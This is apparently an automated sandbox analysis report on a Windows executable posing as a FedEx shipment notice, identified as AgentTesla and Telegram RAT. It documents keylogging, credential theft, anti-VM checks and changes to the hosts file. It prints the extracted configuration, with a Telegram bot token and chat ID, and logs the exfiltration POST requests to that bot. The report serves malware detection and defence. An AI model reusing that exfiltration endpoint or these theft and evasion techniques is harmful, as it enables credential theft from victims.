Loading ...

Play interactive tourEdit tour

Windows Analysis Report FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe

Overview

General Information

Sample Name:FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Analysis ID:528766
MD5:994f1f286b24022af59bc5506b1e2871
SHA1:ed961648e2e90a311a9c5e53c15eed3d95853b96
SHA256:edd31cd4c64b1d9f392c6e141a10c028cb11f9640e6eab34960baf6bdd585dc5
Tags:exeFedEx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Moves itself to temp directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1748127586", "Chat URL": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f09098.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1748127586", "Chat URL": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument"}
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.5604.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendMessage"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeReversingLabs: Detection: 40%
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6Host: api.telegram.orgContent-Length: 1014Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b06051514af6Host: api.telegram.orgContent-Length: 1900Expect: 100-continue
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000003.487860465.0000000001630000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518406294.0000000001633000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://yWRCNh.com
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmpString found in binary or memory: https://190L8dvjH7GrrK.net
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://190L8dvjH7GrrK.netP
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocumentdocument-----
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgD8
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6Host: api.telegram.orgContent-Length: 1014Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bC619B418u002d655Au002d43C1u002dBD01u002dC10710B629CFu007d/u003384BCCB0u002d9651u002d44E6u002dA837u002dDA8EAFCCEF4C.csLarge array initialization: .cctor: array initializer size 12200
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_012E82500_2_012E8250
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_012ED2E80_2_012ED2E8
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133E3301_2_0133E330
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01337B001_2_01337B00
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_013313051_2_01331305
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133D7601_2_0133D760
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_013353B01_2_013353B0
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133AED01_2_0133AED0
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01335B201_2_01335B20
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_013353201_2_01335320
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334F4F1_2_01334F4F
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334FF11_2_01334FF1
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334E081_2_01334E08
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334EAF1_2_01334EAF
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133508D1_2_0133508D
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_01334EEA1_2_01334EEA
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_013350C51_2_013350C5
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_02F949A01_2_02F949A0
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_02F948B01_2_02F948B0
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_05BBC0701_2_05BBC070
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeBinary or memory string: OriginalFilename vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.264554627.0000000006300000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.264453189.0000000005F80000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeBinary or memory string: OriginalFilename vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.515825293.0000000000FC8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.517602931.000000000154A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeBinary or memory string: OriginalFilenameDESCKI.exe. vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeReversingLabs: Detection: 40%
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile read: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe:Zone.IdentifierJump to behavior
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe "C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe"
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: /DESCKI;component/views/addbook.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: views/addcustomer.baml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: views/addbook.baml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: /DESCKI;component/views/addcustomer.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: /DESCKI;component/views/addbook.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: views/addbook.baml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: views/addcustomer.baml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: /DESCKI;component/views/addcustomer.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: I/DESCKI;component/views/addbook.xaml_/DESCKI;component/views/borrowfrombookview.xamlU/DESCKI;component/views/borrowingview.xamlO/DESCKI;component/views/changebook.xamlW/DESCKI;component/views/changecustomer.xamlS/DESCKI;component/views/customerview.xamlW/DESCKI;component/views/deletecustomer.xamlM/DESCKI;component/views/errorview.xamlQ/DESCKI;component/views/smallextras.xamlQ/DESCKI;component/views/addcustomer.xaml
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.b50000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.b50000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_00B592F5 push ds; ret 0_2_00B59340
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 0_2_00B59361 push ds; retf 0_2_00B59364
